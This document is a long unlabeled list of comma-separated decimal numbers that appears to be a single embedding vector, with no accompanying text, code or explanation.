-0.01655343919992447, 0.005874398164451122, 0.11317932605743408, 0.0016795891569927335, -0.008698699064552784, -0.0388813316822052, -0.006374110467731953, -0.007132933009415865, 0.00937238521873951, 0.03737109154462814, -0.008158269338309765, -0.057507652789354324, -0.024415582418441772, 0.0012400272535160184, -0.03212966397404671, -0.028413282707333565, 0.003919966984540224, -0.048505425453186035, 0.03621619939804077, 0.006277869455516338, -0.01724933460354805, -0.02275727689266205, -0.013170200400054455, -0.02465248294174671, -0.036423489451408386, 0.017737941816449165, -0.020639976486563683, 0.01057909894734621, 0.00439376849681139, -0.029938330873847008, 0.031063608825206757, 0.016242505982518196, 0.0055708689615130424, -0.05691540241241455, -0.041842591017484665, 0.033580679446458817, -0.01081599947065115, -0.02987910620868206, 0.000300290179438889, -0.04240523278713226, 0.011423056945204735, 0.0021117478609085083, -0.011245382018387318, -0.017456622794270515, -0.024815352633595467, 0.010068281553685665, 0.031863149255514145, 0.042494069784879684, -0.019988499581813812, 0.02013656310737133, 0.04548494145274162, 0.009024437516927719, -0.02586659975349903, 0.0183746125549078, -0.030619420111179352, 0.025896212086081505, -0.0361865870654583, -0.025333572179079056, -0.0004909212584607303, 0.017545461654663086, 0.022549988701939583, -0.006203838158398867, 0.025289153680205345, 0.0008328541298396885, -0.01668669655919075, 0.027243584394454956, 0.017797168344259262, -0.05892905965447426, 0.002705850638449192, -0.011778408661484718, 0.02089168317615986, -0.014140012674033642, -0.013222021982073784, 0.003675662912428379, 0.007366132456809282, 0.018952058628201485, -0.0011780259665101767, 0.017101271077990532, 0.004190181847661734, 0.031211672350764275, -0.00534877460449934, -0.006703550461679697, -0.034528281539678574, 0.003986595198512077, -0.009550061076879501, 0.004260511603206396, -0.023438366129994392, 0.04098382592201233, -0.019411053508520126, -0.04024351388216019, -0.016094444319605827, 0.009949831292033195, -0.011778408661484718, 0.0076474519446492195, 0.011326816864311695, -0.020195787772536278, 0.014665636233985424, -0.0064333355985581875, 0.0022616616915911436, -0.014724861830472946, 0.046639833599328995, -0.001500988262705505, -0.03183353692293167, -0.013162797316908836, -0.03399525582790375, 0.01761949248611927, -0.005159994121640921, -0.025896212086081505, 0.0033110580407083035, -0.01566506177186966, 0.02937569096684456, -0.035031694918870926, 0.0008666309877298772, 0.027539711445569992, -0.021824480965733528, 0.007499388884752989, 0.0031204267870634794, -0.07835491746664047, -0.01093444973230362, 0.007773305289447308, 0.010416229255497456, -0.045573778450489044, 0.004800941329449415, 0.0360681377351284, -0.02998274937272072, -0.00799539964646101, 0.018522676080465317, -0.025955436751246452, -0.010319988243281841, -0.0027724788524210453, 0.014006756246089935, -0.030116006731987, 0.01742701046168804, 0.022816501557826996, 0.025244735181331635, -0.01738259196281433, -0.017737941816449165, 0.010875224135816097, 0.046462155878543854, -0.009476029314100742, -0.004138359799981117, -0.029064759612083435, 0.02755451761186123, 0.009823977015912533, -0.030589807778596878, 0.007862143218517303, 0.02237231284379959, 0.013755048625171185, -0.010593905113637447, 0.0279246736317873, 0.01855228841304779, -0.014362107031047344, -0.03734147921204567, 0.0377560555934906, 0.0011474878992885351, -0.012215194292366505, -0.0009240054059773684, 0.007251383271068335, -0.01650902070105076, -0.030589807778596878, 0.021469129249453545, -0.0183746125549078, -0.028975920751690865, 0.046402931213378906, -0.014036368578672409, -0.0023875152692198753, -0.006929346360266209, -0.025096671655774117, 0.00813606008887291, 0.04130956530570984, 0.0026410729624330997, -0.00435675261542201, 0.0015463324962183833, -0.001254833536222577, 0.027524905279278755, -0.019277798011898994, 0.010838208720088005, -0.009283547289669514, -0.018330194056034088, -0.009712929837405682, -0.029123984277248383, -0.032011210918426514, -0.009468626230955124, -0.0006334318313747644, 0.00818047858774662, -0.053628403693437576, -0.0036423488054424524, -0.012807446531951427, 0.038762882351875305, 0.013740242458879948, -0.012452094815671444, -0.055730897933244705, -0.00029311838443391025, -0.02180967479944229, -0.011963487602770329, -0.021173004060983658, -0.019085315987467766, -0.02069920115172863, -0.0023153345100581646, -0.017782362177968025, 0.0205067191272974, -0.0175306536257267, -0.007765902206301689, 0.019973693415522575, -0.04880155250430107, -0.00909106619656086, -0.029716236516833305, -0.02564450539648533, -0.007177351973950863, 0.015561416745185852, -0.046728670597076416, -0.01111952867358923, 0.00231348373927176, -0.04353050887584686, -0.004845360293984413, -0.03328455239534378, 0.006174225360155106, 0.039562422782182693, -0.03891094774007797, 0.006122403312474489, 0.04942341521382332, -0.054102204740047455, 0.023764105513691902, 0.014399122446775436, -0.018063681200146675, -0.004645475186407566, -0.015280097723007202, -0.00359607907012105, -0.04889038950204849, -0.0514666847884655, 0.023527204990386963, 0.01664227619767189, -0.0036145870108157396, -0.012096744030714035, 0.02564450539648533, 0.00210434477776289, -0.006396319717168808, 0.007973190397024155, -0.029657011851668358, 0.00871350523084402, -0.020447494462132454, 0.019544310867786407, -0.010727161541581154, 0.001017932896502316, 0.04930496588349342, -0.020639976486563683, 0.037874504923820496, -0.001087337383069098, -0.0284280888736248, 0.0030686049722135067, -0.04749859869480133, 0.012452094815671444, -0.0033647308591753244, 0.002889078576117754, -0.01337748859077692, 0.0006653579184785485, 0.0033018039539456367, 0.011267591267824173, 0.011941277422010899, 0.008350751362740993, 0.0055486592464149, -0.0032351757399737835, -0.0008689445094205439, -0.034469056874513626, 0.05537554621696472, -0.037874504923820496, -0.029242435470223427, -0.018567094579339027, -0.026236755773425102, 0.024918995797634125, 0.023201465606689453, -0.03366951644420624, 0.004230899270623922, -0.04228677973151207, -0.0098609933629632, -0.0026651332154870033, -0.03603852540254593, 0.02996794320642948, 0.03432099521160126, -0.02209099382162094, 0.038614820688962936, -0.02317185327410698, -0.0289907269179821, -0.008558039553463459, 0.06514770537614822, -0.007095917593687773, -0.04628448188304901, 0.011415653862059116, 0.0415760800242424, -0.010601308196783066, -0.004815747961401939, 0.008854164741933346, -0.034291382879018784, -0.019425859674811363, 0.011904262006282806, -0.014613814651966095, -0.009638899005949497, 0.020477106794714928, 0.034794796258211136, 0.009853590279817581, -0.014391719363629818, 0.018433839082717896, 0.013932724483311176, 0.0034239559900015593, -0.018729964271187782, -0.0026540285907685757, 0.0057596489787101746, 0.05271041393280029, 0.014961762353777885, -0.007773305289447308, 0.014843312092125416, -0.014325091615319252, -0.010031265206634998, 0.0025022639892995358, -0.012259612791240215, 0.012918493710458279, 0.011430460959672928, 0.00722547248005867, 0.023645654320716858, -0.012711205519735813, 0.016790339723229408, 0.016568245366215706, -0.03612736240029335, -0.002996424213051796, 0.024119455367326736, 0.007070006337016821, 0.03325494006276131, -0.022535182535648346, -0.0432639978826046, -0.01827096939086914, -0.025881405919790268, -0.008883778005838394, 0.007292100694030523, 0.0022413029801100492, 0.04456695169210434, -0.024208294227719307, -0.004501114133745432, -0.01195608451962471, -0.029849492013454437, -0.046462155878543854, 0.003875548020005226, 0.015768704935908318, -0.03968087211251259, 0.0013954933965578675, 0.030012361705303192, -0.03645310178399086, 0.0019710881169885397, 0.003157442668452859, -0.01870035193860531, -0.05229583755135536, 0.003522047773003578, 0.028783438727259636, 0.00872090831398964, -0.011778408661484718, 0.019751599058508873, -0.02414906956255436, -0.004871271550655365, 0.02055113948881626, 0.037223029881715775, 0.04634370654821396, -0.039562422782182693, 0.0017277096631005406, -0.005711528472602367, -0.013947530649602413, 0.01874477043747902, 0.017886005342006683, -0.00841737911105156, 0.0016166624845936894, 0.020121756941080093, -0.024682095274329185, 0.00397549057379365, -0.01044584158807993, -0.011993099935352802, 0.004227197729051113, -0.040954213589429855, -0.004775030538439751, -0.028368862345814705, 0.026873426511883736, -0.02106935903429985, 0.052325449883937836, 0.01533932238817215, 0.02395658753812313, 0.04187220707535744, -0.0033018039539456367, 0.016153668984770775, -0.02699187770485878, -0.049571480602025986, 0.0023338424507528543, 0.03016042523086071, -0.013236829079687595, -0.03509092330932617, 0.0404508002102375, 0.020062530413269997, 0.028872277587652206, -0.0007356878486461937, 0.026680946350097656, 0.00005963004514342174, 0.03399525582790375, -0.016331344842910767, -0.029198015108704567, 0.0017619492718949914, -0.0014593455707654357, -0.035594336688518524, 0.01055688876658678, -0.02371968701481819, 0.002581847831606865, -0.05709307640790939, -0.007632645778357983, -0.016627470031380653, 0.002041418105363846, 0.008469201624393463, 0.009949831292033195, 0.009735140018165112, -0.016375763341784477, -0.031152447685599327, -0.004804642871022224, 0.046550996601581573, 0.015235678292810917, 0.014273269101977348, -0.003510942915454507, -0.00737723708152771, 0.022446345537900925, -0.014354703947901726, -0.003322162665426731, -0.003140785498544574, -0.01219298504292965, 0.03716380149126053, -0.009401997551321983, 0.015961186960339546, -0.011474879458546638, 0.03002716787159443, 0.007214367855340242, -0.01636095717549324, -0.019307410344481468, 0.02497822232544422, -0.03677884116768837, 0.0007592853507958353, -0.015398547984659672, 0.01738259196281433, -0.019884856417775154, 0.034942857921123505, 0.002143211429938674, -0.012274419888854027, -0.004397470038384199, -0.0066332207061350346, -0.002567041665315628, 0.00037756055826321244, -0.006344497669488192, 0.009801767766475677, -0.0045122187584638596, -0.0005987295880913734, 0.029405303299427032, 0.0056967223063111305, 0.021039746701717377, -0.0005612511886283755, 0.023764105513691902, -0.004297527484595776, 0.01295550912618637, 0.004275317769497633, -0.0175306536257267, 0.02890188992023468, -0.03748954087495804, -0.0311820600181818, 0.03387680649757385, 0.021883705630898476, 0.017042046412825584, -0.02102494053542614, -0.022490764036774635, 0.005407999735325575, -0.02512628398835659, -0.0052821459248661995, -0.001384388655424118, -0.031626246869564056, 0.01342931017279625, -0.04726169630885124, -0.011341623030602932, 0.016479408368468285, 0.013814274221658707, -0.025096671655774117, 0.007973190397024155, -0.017175303772091866, 0.034143317490816116, -0.011245382018387318, 0.005704125389456749, -0.009431610815227032, -0.0015629896661266685, -0.0032407280523329973, 0.030974771827459335, 0.005948429461568594, 0.0004606146248988807, 0.0135403573513031, -0.009239128790795803, 0.003224070882424712, -0.013488535769283772, 0.015739092603325844, 0.017782362177968025, -0.020269818603992462, -0.03346223011612892, -0.0010327391792088747, 0.012311435304582119, -0.005637497175484896, -0.024163875728845596, 0.016805145889520645, 0.03432099521160126, 0.001482480438426137, 0.07095176726579666, -0.002661431673914194, 0.020847264677286148, -0.00044141270336695015, 0.0011613687966018915, 0.010764176957309246, -0.02419348806142807, 0.010460647754371166, 0.016434988006949425, -0.04222755506634712, 0.013666211627423763, 0.02000330574810505, 0.015428160317242146, 0.03248501196503639, 0.007329116575419903, -0.02400100603699684, -0.01104549691081047, -0.005607884842902422, -0.02718435972929001, 0.018404226750135422, 0.012126356363296509, -0.022253863513469696, -0.020714007318019867, 0.035623949021101, 0.04693595692515373, 0.008150866255164146, -0.01450276654213667, 0.01414741575717926, 0.01116394717246294, 0.0000582997890887782, -0.009416804648935795, 0.01372543629258871, -0.02768777310848236, -0.005296952556818724, 0.0006949705420993268, 0.018211744725704193, 0.021232228726148605, 0.03473557159304619, -0.026118306443095207, -0.014302882365882397, 0.000907348352484405, 0.019411053508520126, 0.019100122153759003, -0.015694674104452133, 0.025748148560523987, 0.03837791830301285, -0.003694170853123069, 0.0072328755632042885, 0.007288399152457714, -0.014014159329235554, -0.03523898497223854, 0.001065127900801599, -0.011504491791129112, 0.001634244923479855, -0.03953281044960022, -0.001317760325036943, 0.020728815346956253, 0.019425859674811363, -0.0018258013296872377, -0.02126184105873108, 0.006599906366318464, -0.0010059027699753642, -0.011504491791129112, -0.002787285251542926, 0.0036701106000691652, 0.01522087212651968, -0.030708257108926773, 0.00561528792604804, -0.004797239787876606, -0.002844659611582756, -0.00048120462452061474, 0.003931071609258652, -0.029893912374973297, 0.01074196770787239, -0.007706677075475454, -0.010616114363074303, -0.021824480965733528, -0.032188888639211655, 0.020565945655107498, 0.0004858315805904567, 0.01757507398724556, 0.00459365313872695, 0.026162724941968918, -0.017782362177968025, 0.041428014636039734, -0.02246115170419216, -0.024918995797634125, 0.004530726466327906, -0.023201465606689453, -0.0005742066423408687, 0.008757923729717731, -0.008395169861614704, 0.012829655781388283, 0.010231150314211845, -0.007780708372592926, -0.010319988243281841, 0.03278113901615143, 0.005137784872204065, -0.02406023070216179, -0.00054042978445068, -0.038674045354127884, -0.01892244629561901, 0.004730611573904753, -0.016479408368468285, 0.013681017793715, 0.002245004754513502, -0.003214817028492689, 0.009342772886157036, -0.012577948160469532, -0.01456939522176981, 0.00005656467692460865, -0.04317516088485718, 0.008757923729717731, -0.013273844495415688, 0.006285272538661957, -0.008387766778469086, -0.010919643566012383, 0.009550061076879501, 0.009105872362852097, -0.018952058628201485, 0.00561898946762085, 0.014310285449028015, -0.028087543323636055, 0.004815747961401939, 0.008802343159914017, -0.019840436056256294, 0.01498397160321474, 0.003997699823230505, 0.0037182311061769724, -0.000003994374310423154, 0.006344497669488192, -0.020536333322525024, -0.008632070384919643, -0.004967512097209692, 0.010127506218850613, 0.015975993126630783, -0.018389420583844185, 0.027524905279278755, 0.007847337052226067, 0.008387766778469086, 0.023438366129994392, -0.04033235087990761, -0.010053475387394428, -0.015620642341673374, 0.03198159858584404, -0.03210005164146423, -0.007084812503308058, -0.013207215815782547, -0.029168402776122093, 0.01081599947065115, -0.01100107841193676, 0.03278113901615143, 0.032277725636959076, -0.0004816673172172159, 0.016198087483644485, -0.030412131920456886, 0.01603521779179573, 0.008476604707539082, 0.03325494006276131, -0.00822489708662033, -0.0002894168137572706, -0.004634370561689138, 0.019218571484088898, -0.02223905734717846, 0.009216919541358948, 0.005167397204786539, 0.025674117729067802, 0.02577776089310646, -0.015931574627757072, -0.014458348043262959, -0.02968662418425083, 0.023467978462576866, 0.011904262006282806, -0.007454969920217991, 0.033965643495321274, -0.014399122446775436, -0.0007278220145963132, -0.0020488211885094643, -0.005859591532498598, -0.024815352633595467, 0.03991777449846268, -0.01517645362764597, -0.008965211920440197, -0.03346223011612892, 0.023231077939271927, 0.025674117729067802, -0.0009309458546340466, -0.02275727689266205, 0.030382519587874413, -0.006488859187811613, -0.03328455239534378, -0.0243859700858593, -0.0070181842893362045, -0.02382333017885685, -0.0449519157409668, 0.03515014797449112, -0.02480054646730423, 0.026029467582702637, -0.00603726739063859, -0.00937238521873951, 0.018907640129327774, 0.03772644326090813, -0.004271616227924824, 0.0025577875785529613, 0.0018942805472761393, -0.017930423840880394, 0.0013455221196636558, 0.0034369113855063915, -0.03035290725529194, 0.0016203640261664987, -0.00799539964646101, -0.06008394807577133, -0.007669661194086075, -0.03683806583285332, -0.0011428609723225236, 0.011874649673700333, 0.03426177054643631, 0.005829979199916124, 0.0019044597866013646, -0.0022894234862178564, -0.017219722270965576, 0.002009954769164324, 0.007484582718461752, 0.026221949607133865, 0.023186659440398216, -0.01104549691081047, -0.0023319916799664497, 0.046728670597076416, -0.0260146614164114, -0.0057707540690898895, -0.015087615698575974, -0.01027556974440813, -0.021854093298316002, -0.025940630584955215, -0.02484496496617794, 0.005159994121640921, 0.011682167649269104, 0.0074031478725373745, 0.04341205954551697, 0.028887083753943443, -0.0124743040651083, -0.0068182991817593575, -0.010001652874052525, 0.012644576840102673, 0.008099043741822243, -0.0034591208677738905, -0.0004465023521333933, -0.011356429196894169, 0.03248501196503639, -0.005670811515301466, -0.0060483720153570175, -0.005937324836850166, 0.00252262270078063, 0.015324516221880913, -0.016005605459213257, -0.032840363681316376, 0.0008717206656001508, -0.01391791831701994, -0.035623949021101, -0.023926975205540657, 0.016953209415078163, 0.00864687655121088, -0.023660460487008095, -0.03266268968582153, -0.01128239743411541, -0.013747645542025566, 0.02367526665329933, 0.030589807778596878, -0.012459497898817062, -0.005122978240251541, -0.0012465050676837564, 0.03215927630662918, 0.013103571720421314, -0.07906562089920044, 0.011985696852207184, -0.019499892368912697, -0.011526701040565968, -0.01809329353272915, 0.004704700782895088, 0.027702579274773598, -0.050282180309295654, -0.03189276158809662, 0.03257385268807411, 0.038762882351875305, -0.002957557560876012, -0.018996477127075195, -0.029198015108704567, -0.007318011950701475, -0.013866095803678036, -0.00336288008838892, 0.0344986692070961, -0.02531876601278782, 0.004086537752300501, -0.01822655089199543, 0.03133012354373932, -0.00030861873528920114, 0.0076178391464054585, 0.0254520233720541, 0.019973693415522575, -0.005718932021409273, 0.0003893593093380332, -0.03840753063559532, -0.021750448271632195, -0.002996424213051796, -0.04178336635231972, -0.0009661107906140387, 0.021276647225022316, 0.06420010328292847, 0.012407676316797733, -0.009823977015912533, -0.03257385268807411, 0.01200790610164404, -0.007573420647531748, -0.03085632063448429, -0.03473557159304619, 0.011134334839880466, -0.0006894181715324521, 0.002576295519247651, 0.004108747001737356, -0.008824552409350872, 0.013118377886712551, 0.011985696852207184, 0.029123984277248383, 0.008276719599962234, 0.006348199211061001, 0.004486307501792908, -0.008965211920440197, -0.039828937500715256, -0.016745921224355698, 0.015827929601073265, 0.028516925871372223, -0.018537482246756554, 0.0007833456038497388, 0.002657730132341385, 0.0023005283437669277, -0.013836483471095562, -0.01242248248308897, -0.01140084769576788, -0.014199238270521164, -0.017604686319828033, -0.0035257493145763874, -0.012341047637164593, -0.010853014886379242, 0.01907050982117653, -0.02004772424697876, -0.011571120470762253, -0.002683641156181693, 0.025007834658026695, 0.0043419464491307735, 0.023334722965955734, -0.02046230062842369, -0.01939624734222889, 0.006059476640075445, 0.03239617496728897, -0.044448502361774445, -0.013340473175048828, -0.02274247072637081, -0.02018098160624504, -0.013888305984437466, 0.007936174981296062, 0.03565356135368347, 0.019559117034077644, -0.015161647461354733, 0.024726513773202896, -0.018019262701272964, -0.013051750138401985, -0.012681592255830765, 0.013651404529809952, -0.019514698535203934, 0.012452094815671444, 0.018715158104896545, -0.015413354150950909, -0.011615538969635963, -0.005407999735325575, 0.01673111505806446, 0.02805793099105358, -0.0024856070522218943, -0.01976640522480011, -0.006163120735436678, -0.0019803422037512064, 0.03150779753923416, -0.030560195446014404, 0.005630094092339277, -0.0008800492505542934, 0.0010725311003625393, -0.02619233727455139, -0.012022712267935276, 0.00948343239724636, -0.021602386608719826, -0.010416229255497456, 0.025348378345370293, -0.020255012437701225, -0.02909437194466591, 0.0072328755632042885, -0.0112379789352417, 0.019736792892217636, 0.000790286052506417, -0.006207539699971676, -0.004134658258408308, 0.0009119752794504166, 0.03822985664010048, -0.03007158637046814, 0.016953209415078163, -0.018818803131580353, -0.02619233727455139, 0.006551785860210657, 0.0035479587968438864, 0.030382519587874413, -0.026843814179301262, 0.001906310673803091, -0.009779558517038822, -0.005208114627748728, 0.010305182076990604, 0.011689570732414722, -0.00596693716943264, -0.01935182884335518, 0.025570472702383995, -0.0017323365900665522, -0.007714080158621073, 0.011060303077101707, 0.002720656804740429, 0.0068182991817593575, -0.017501041293144226, 0.0008101820130832493, 0.01813771203160286, -0.0155910300090909, -0.02143951691687107, 0.011941277422010899, 0.04909767955541611, -0.0028594660107046366, -0.029627397656440735, 0.003986595198512077, -0.009150290861725807, 0.012600158341228962, -0.0014028965961188078, -0.004652878735214472, 0.018581900745630264, -0.03509092330932617, 0.021898511797189713, 0.010423632338643074, 0.04261251911520958, -0.020521527156233788, -0.009105872362852097, 0.0036201393231749535, -0.000031636889616493136, -0.019411053508520126, 0.011200962588191032, -0.006733163259923458, -0.018493063747882843, -0.024785740301012993, 0.007203263230621815, -0.027850642800331116, -0.02857615053653717, -0.013977143913507462, -0.0025614891201257706, 0.010734564624726772, -0.00504524540156126, -0.006107597146183252, -0.007007079664617777, 0.033314164727926254, -0.025244735181331635, -0.003470225725322962, 0.04068770259618759, -0.025703730061650276, 0.011378638446331024, 0.0008097193203866482, -0.02130625955760479, -0.03301804140210152, -0.016701502725481987, -0.00486016646027565, -0.006414827890694141, 0.0202846247702837, -0.030649032443761826, 0.010223747231066227, 0.01616847515106201, -0.0021450622007250786, 0.01193387433886528, 0.006277869455516338, -0.020714007318019867, -0.00937238521873951, 0.013014733791351318, -0.01809329353272915, -0.018330194056034088, -0.011867246590554714, 0.00630378071218729, 0.10163041949272156, -0.0161240566521883, 0.003140785498544574, -0.019973693415522575, 0.0032092647161334753, 0.008846761658787727, 0.0038459354545921087, 0.015206065960228443, -0.011052899993956089, -0.007706677075475454, 0.026177531108260155, -0.01976640522480011, -0.01911492832005024, 0.007884352467954159, 0.022624019533395767, -0.0008814373286440969, -0.010282972827553749, -0.019144540652632713, 0.033906418830156326, -0.00955746416002512, 0.026088694110512733, -0.005322863347828388, 0.014806295745074749, -0.0202846247702837, 0.02525954134762287, -0.001665708259679377, -0.03473557159304619, -0.021617192775011063, -0.012415079399943352, -0.015961186960339546, -0.006288974080234766, -0.001100292894989252, -0.013155394233763218, -0.011489685624837875, 0.00030769334989599884, 0.001337193651124835, 0.02176525443792343, 0.008313735015690327, -0.03384719416499138, -0.004031014163047075, 0.003407298820093274, -0.0038792495615780354, -0.019840436056256294, -0.011075109243392944, 0.024770934134721756, -0.01235585380345583, 0.04791317507624626, 0.0024856070522218943, -0.018803995102643967, -0.012326241470873356, 0.002452292712405324, -0.013229425065219402, 0.0366307757794857, 0.022016962990164757, 0.018848415464162827, 0.028961114585399628, 0.011985696852207184, -0.005178501829504967, -0.008143463172018528, -0.0226980522274971, -0.01086041796952486, 0.012577948160469532, -0.007214367855340242, -0.0015176453161984682, 0.027154747396707535, -0.016790339723229408, -0.038674045354127884, -0.00405692495405674, -0.021365486085414886, 0.030589807778596878, 0.006855315063148737, 0.01146747637540102, -0.0040347157046198845, -0.011267591267824173, 0.023275498300790787, 0.0070626032538712025, 0.015546610578894615, 0.028502119705080986, -0.014547185972332954, -0.01790081150829792, 0.021750448271632195, 0.029627397656440735, 0.00436045415699482, 0.029049953445792198, -0.014199238270521164, 0.029168402776122093, -0.009054049849510193, -0.0071921581402421, -0.002487457823008299, 0.0019581327214837074, 0.005459821783006191, 0.0028742721769958735, 0.02106935903429985, -0.0014241805765777826, 0.005382088478654623, 0.025422411039471626, 0.021706029772758484, -0.006592503283172846, -0.012133759446442127, -0.01566506177186966, 0.004530726466327906, -0.01744181662797928, 0.02377891167998314, -0.0034369113855063915, 0.0010577248176559806, 0.008861567825078964, -0.011393444612622261, 0.015783511102199554, 0.007569718640297651, -0.023142240941524506, -0.03458750620484352, -0.02009214460849762, 0.012348450720310211, -0.011778408661484718, -0.00783253088593483, 0.03840753063559532, 0.005367282312363386, -0.013718033209443092, -0.019085315987467766, -0.03289958834648132, -0.007869546301662922, -0.029331272467970848, 0.04829813912510872, -0.01846345141530037, -0.0001924818498082459, 0.0030741572845727205, -0.005774455610662699, -0.013718033209443092, 0.02382333017885685, 0.016745921224355698, 0.02265363372862339, 0.004219794180244207, 0.009039243683218956, -0.023393947631120682, 0.011593329720199108, -0.029582979157567024, 0.02386774867773056, 0.015020987018942833, 0.006281570997089148, -0.007566017098724842, -0.014673039317131042, 0.024178681895136833, 0.02718435972929001, -0.003897757502272725, 0.011482282541692257, -0.004682491067796946, 0.006999676581472158, 0.0019858945161104202, 0.005922518204897642, 0.033580679446458817, -0.001954431179910898, -0.021883705630898476, 0.010068281553685665, 0.019544310867786407, -0.008335944265127182, 0.015020987018942833, 0.010282972827553749, -0.01898167096078396, -0.0010419930331408978, 0.0005519972182810307, 0.004889779258519411, 0.0000706190912751481, 0.0155910300090909, -0.001248355838470161, -0.008521023206412792, 0.028472507372498512, 0.007388341706246138, -0.05081520974636078, -0.021735642105340958, -0.027806224301457405, -0.0021284050308167934, -0.0016323941526934505, -0.008454395458102226, -0.0029446021653711796, 0.02675497718155384, -0.006592503283172846, 0.0007814948330633342, 0.02642923779785633, 0.02252037636935711, -0.034054480493068695, 0.008017608895897865, 0.01981082372367382, 0.026088694110512733, 0.019188959151506424, 0.009357579052448273, -0.028146767988801003, -0.007847337052226067, 0.0036479011178016663, -0.021898511797189713, 0.011741392314434052, 0.01790081150829792, 0.05161474645137787, -0.008587651886045933, -0.013606986030936241, -0.003897757502272725, -0.01599079929292202, -0.021691223606467247, -0.0009864694438874722, -0.013903112150728703, 0.023097822442650795, 0.006359304301440716, -0.014369510114192963, 0.000319260754622519, 0.0017721285112202168, -0.00216171913780272, -0.02527434751391411, 0.0036812154576182365, 0.013014733791351318, -0.0026540285907685757, -0.005748544353991747, -0.006799791473895311, 0.010608711279928684, 0.006355602759867907, -0.020965715870261192, -0.013999353162944317, -0.002196884248405695, 0.002341245533898473, -0.007532703224569559, 0.00783253088593483, -0.002146912971511483, 0.00319260754622519, 0.0254520233720541, 0.009098469279706478, 0.006984869949519634, -0.0024856070522218943, 0.002376410411670804, 0.04024351388216019, -0.04003622382879257, -0.002679939614608884, -0.0005968788173049688, -0.023749299347400665, -0.01349593885242939, -0.016523826867341995, 0.009061452932655811, -0.01644979417324066, -0.024726513773202896, 0.02620714344084263, 0.005485732574015856, -0.01296291220933199, -0.01258535124361515, 0.0032166677992790937, 0.0015306008281186223, -0.017278946936130524, 0.014835909008979797, -0.005259936675429344, -0.00024152769765350968, -0.001804517349228263, -0.009542657993733883, -0.007132933009415865, 0.019455473870038986, -0.0046639833599328995, -0.002406023209914565, 0.005485732574015856, -0.006348199211061001, -0.013103571720421314, 0.02061036415398121, 0.016953209415078163, -0.002518921159207821, 0.028916696086525917, 0.0048342556692659855, 0.010793790221214294, -0.01770832948386669, -0.011682167649269104, 0.005826277658343315, -0.01402896549552679, 0.018937252461910248, 0.002095090923830867, -0.003242578823119402, 0.012918493710458279, 0.01027556974440813, 0.012392870150506496, 0.0005408924771472812, 0.007114425301551819, 0.00026975219952873886, -0.020477106794714928, -0.011822827160358429, 0.008402572944760323, -0.022253863513469696, -0.0020580750424414873, 0.0015611388953402638, -0.026503270491957664, 0.07403147965669632, -0.008128656074404716, -0.02694745920598507, -0.007266189903020859, -0.05043024569749832, -0.015428160317242146, -0.019544310867786407, -0.01086041796952486, -0.010112700052559376, -0.0017924872227013111, 0.007451268378645182, -0.013644001446664333, -0.03124128468334675, 0.04661022126674652, 0.00393847469240427, -0.020447494462132454, 0.013644001446664333, -0.010416229255497456, 0.01870035193860531, 0.003697872394695878, 0.04246445745229721, 0.018345000222325325, 0.009616688825190067, -0.02480054646730423, 0.008683892898261547, -0.007469776552170515, -0.01952950470149517, 0.011052899993956089, -0.027939479798078537, 0.009698123671114445, -0.0018165474757552147, -0.001871145679615438, -0.03920707106590271, -0.01063092052936554, -0.009150290861725807, -0.005667109973728657, 0.005541256163269281, -0.008010205812752247, 0.00010266084427712485, 0.008128656074404716, -0.01705685257911682, -0.006670236587524414, -0.018493063747882843, -0.02180967479944229, 0.017145691439509392, 0.002093240153044462, 0.0026558793615549803, -0.009498238563537598, -0.020121756941080093, 0.021883705630898476, 0.008943002671003342, 0.026843814179301262, 0.0056337956339120865, 0.020862070843577385, -0.004700998775660992, 0.012696398422122002, 0.016953209415078163, -0.011563717387616634, -0.012859268113970757, -0.02369007281959057, 0.028368862345814705, -0.008017608895897865, 0.017367785796523094, 0.009327966719865799, -0.0015231977449730039, -0.007654855027794838, 0.004223495721817017, 0.015398547984659672, -0.020018111914396286, -0.02158758044242859, 0.0006908062496222556, -0.004186480306088924, 0.03959203511476517, -0.007480881176888943, -0.006485157646238804, 0.010083087719976902, 0.037134189158678055, 0.013636598363518715, -0.02232789434492588, -0.022920146584510803, 0.0009226173278875649, -0.013569970615208149, -0.00920951645821333, 0.012644576840102673, -0.0002908049209509045, 0.010993674397468567, 0.007891755551099777, 0.015546610578894615, -0.023364335298538208, -0.003359178313985467, 0.01818213239312172, 0.014554589055478573, 0.00967591442167759, -0.0006107597146183252, -0.008513620123267174, 0.019559117034077644, -9.290083085033984e-7, -0.00447520287707448, 0.0405692495405674, 0.007869546301662922, -0.007640048861503601, 0.005678214598447084, 0.0074142529629170895, -0.03580162301659584, 0.002720656804740429, -0.00943901389837265, 0.014177028089761734, -0.005363580770790577, -0.012837058864533901, 0.014613814651966095, -0.005656004883348942, 0.01599079929292202, 0.025333572179079056, 0.023808524012565613, 0.011852440424263477, -0.018715158104896545, -0.005596779752522707, -0.01841903291642666, 0.01570948027074337, 0.00020578438125085086, -0.008328541181981564, 0.0013519999338313937, 0.008780133910477161, 0.026932653039693832, 0.02306821011006832, 0.004138359799981117, -0.0010484708473086357, 0.04027312621474266, -0.02098052203655243, 0.015694674104452133, -0.0027077014092355967, 0.00866908673197031, -0.030116006731987, -0.027258390560746193, -0.007243980187922716, -0.0014047473669052124, 0.0022949757985770702, 0.0025688924361020327, -0.016331344842910767, 0.01325903832912445, -0.01785639300942421, -0.01668669655919075, -0.016109250485897064, 0.00990541186183691, -0.010223747231066227, 0.012444691732525826, -0.0031740996055305004, -0.01622769981622696, -0.004179077222943306, 0.005948429461568594, 0.011778408661484718, 0.026221949607133865, -0.0035516603384166956, -0.002518921159207821, -0.0009087364305742085, -0.013851289637386799, -0.004560339264571667, 0.0021135988645255566, -0.0074586714617908, 0.025185510516166687, -0.01770832948386669, -0.00818047858774662, -0.0005362655501812696, -0.018729964271187782, -0.020255012437701225, -0.027421260252594948, -0.023808524012565613, -0.025244735181331635, 0.014080788008868694, 0.01729375310242176, 0.01503579318523407, 0.006977466866374016, 0.01594638079404831, 0.007084812503308058, -0.010060878470540047, 0.0008129581692628562, 0.005693020764738321, -0.01742701046168804, 0.017930423840880394, 0.0036849169991910458, -0.021928124129772186, 0.027065908536314964, -0.0007685393211431801, 0.012215194292366505, 0.01687917672097683, -0.022624019533395767, 0.008609861135482788, -0.0006935824058018625, -0.010764176957309246, 0.02395658753812313, -0.013014733791351318, 0.023438366129994392, 0.0029668116476386786, -0.011689570732414722, -0.022860921919345856, -0.015961186960339546, -0.014117803424596786, -0.0011428609723225236, -0.02180967479944229, 0.01939624734222889, 0.003542406251654029, -0.017145691439509392, 0.01044584158807993, -0.0019581327214837074, 0.02215021848678589, 0.0015056151896715164, 0.01566506177186966, 0.0065739955753088, 0.018300581723451614, 0.005900308955460787, 